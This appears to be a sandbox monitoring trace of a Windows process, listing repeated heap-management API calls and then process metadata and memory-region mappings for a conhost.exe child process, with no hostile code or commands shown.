[0195.483] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779488) returned 1
[0195.483] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47769e0) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47769e0) returned 0xa0
[0195.484] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47769e0) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777480) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777480) returned 0x10
[0195.484] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777480) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47793a8) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47793a8) returned 0x14
[0195.484] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47793a8) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477ada8) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477ada8) returned 0x6e
[0195.484] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477ada8) returned 1
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] GetProcessHeap () returned 0x4770000
[0195.484] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477aaa8) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477aaa8) returned 0x10
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477aaa8) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779688) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779688) returned 0x14
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779688) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777408) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777408) returned 0xc
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777408) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47774b0) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47774b0) returned 0x10
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47774b0) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779608) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779608) returned 0x14
[0195.485] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779608) returned 1
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] GetProcessHeap () returned 0x4770000
[0195.485] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4778ce0) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4778ce0) returned 0x208
[0195.486] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4778ce0) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777438) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777438) returned 0x10
[0195.486] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777438) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779588) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779588) returned 0x14
[0195.486] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779588) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477a798) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477a798) returned 0x200
[0195.486] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477a798) returned 1
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] GetProcessHeap () returned 0x4770000
[0195.486] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777468) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777468) returned 0x10
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777468) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779468) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779468) returned 0x14
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779468) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47795e8) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47795e8) returned 0x14
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47795e8) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47773a8) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47773a8) returned 0x10
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47773a8) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4772780) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4772780) returned 0x14
[0195.487] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4772780) returned 1
[0195.487] GetProcessHeap () returned 0x4770000
[0195.487] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779448) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779448) returned 0x16
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779448) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777348) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777348) returned 0x10
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777348) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776618) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776618) returned 0x14
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776618) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4770598) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4770598) returned 0x2
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4770598) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776e48) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.488] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776e48) returned 0x14
[0195.488] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776e48) returned 1
[0195.488] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776c10) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776c10) returned 0x14
[0195.489] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776c10) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776c30) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776c30) returned 0x14
[0195.489] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776c30) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776c50) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776c50) returned 0x14
[0195.489] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776c50) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779548) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779548) returned 0x14
[0195.489] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779548) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779528) returned 1
[0195.489] GetProcessHeap () returned 0x4770000
[0195.489] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779528) returned 0x14
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779528) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776a88) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776a88) returned 0x30
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776a88) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47795a8) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47795a8) returned 0x14
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47795a8) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47770d0) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47770d0) returned 0x30
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47770d0) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47794a8) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794a8) returned 0x14
[0195.490] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47794a8) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47892c0) returned 1
[0195.490] GetProcessHeap () returned 0x4770000
[0195.490] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47892c0) returned 0x82
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47892c0) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4781e50) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4781e50) returned 0x14
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4781e50) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47774e0) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47774e0) returned 0x10
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47774e0) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776840) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776840) returned 0x14
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776840) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776860) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776860) returned 0x14
[0195.491] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776860) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776880) returned 1
[0195.491] GetProcessHeap () returned 0x4770000
[0195.491] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776880) returned 0x14
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776880) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47765d8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47765d8) returned 0x14
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47765d8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47773d8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47773d8) returned 0x10
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47773d8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47765f8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47765f8) returned 0x14
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47765f8) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47727a0) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47727a0) returned 0x14
[0195.492] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47727a0) returned 1
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] GetProcessHeap () returned 0x4770000
[0195.492] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47793c8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47793c8) returned 0x14
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47793c8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779428) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779428) returned 0x14
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779428) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47794e8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794e8) returned 0x14
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47794e8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47793e8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47793e8) returned 0x14
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47793e8) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777390) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777390) returned 0x10
[0195.493] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777390) returned 1
[0195.493] GetProcessHeap () returned 0x4770000
[0195.493] GetProcessHeap () returned 0x4770000
[0195.494] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47727c0) returned 1
[0195.494] GetProcessHeap () returned 0x4770000
[0195.494] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47727c0) returned 0x14
[0195.494] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47727c0) returned 1
[0195.494] GetProcessHeap () returned 0x4770000
[0195.494] GetProcessHeap () returned 0x4770000
[0195.494] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777378) returned 1
[0195.494] GetProcessHeap () returned 0x4770000
[0195.494] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777378) returned 0x10
[0195.494] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777378) returned 1
[0195.494] exit (_Code=0)
Thread:
id = 18
os_tid = 0x2f8
Process:
id = "3"
image_name = "conhost.exe"
filename = "c:\\windows\\system32\\conhost.exe"
page_root = "0x20994000"
os_pid = "0x4e4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0x12c8"
cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
cur_dir = "C:\\Windows"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 968
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 969
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 970
start_va = 0x50000
end_va = 0x8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 971
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 972
start_va = 0x400000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 973
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 974
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 975
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 976
start_va = 0x7ff747c50000
end_va = 0x7ff747c60fff
monitored = 0
entry_point = 0x7ff747c516b0
region_type = mapped_file
name = "conhost.exe"
filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")
Region:
id = 977
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 978
start_va = 0x6d0000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 979
start_va = 0x7ffc5bfa0000
end_va = 0x7ffc5c187fff
monitored = 0
entry_point = 0x7ffc5bfcba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 980
start_va = 0x7ffc5ecd0000
end_va = 0x7ffc5ed7cfff
monitored = 0
entry_point = 0x7ffc5ece81a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 981
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 982
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 983
start_va = 0x90000
end_va = 0x14dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 984
start_va = 0x7ffc5e850000
end_va = 0x7ffc5e8ecfff
monitored = 0
entry_point = 0x7ffc5e8578a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 985
start_va = 0x150000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 986
start_va = 0x7d0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 987
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 988
start_va = 0x7ffc53880000
end_va = 0x7ffc538d8fff
monitored = 0
entry_point = 0x7ffc5388fbf0
region_type = mapped_file
name = "conhostv2.dll"
filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")
Region:
id = 989
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 990
start_va = 0x7ffc5f2c0000
end_va = 0x7ffc5f53cfff
monitored = 0
entry_point = 0x7ffc5f394970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 991
start_va = 0x7ffc5e2b0000
end_va = 0x7ffc5e3cbfff
monitored = 0
entry_point = 0x7ffc5e2f02b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 992
start_va = 0x7ffc5cac0000
end_va = 0x7ffc5cb29fff
monitored = 0
entry_point = 0x7ffc5caf6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 993
start_va = 0x7ffc5e960000
end_va = 0x7ffc5eab5fff
monitored = 0
entry_point = 0x7ffc5e96a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 994
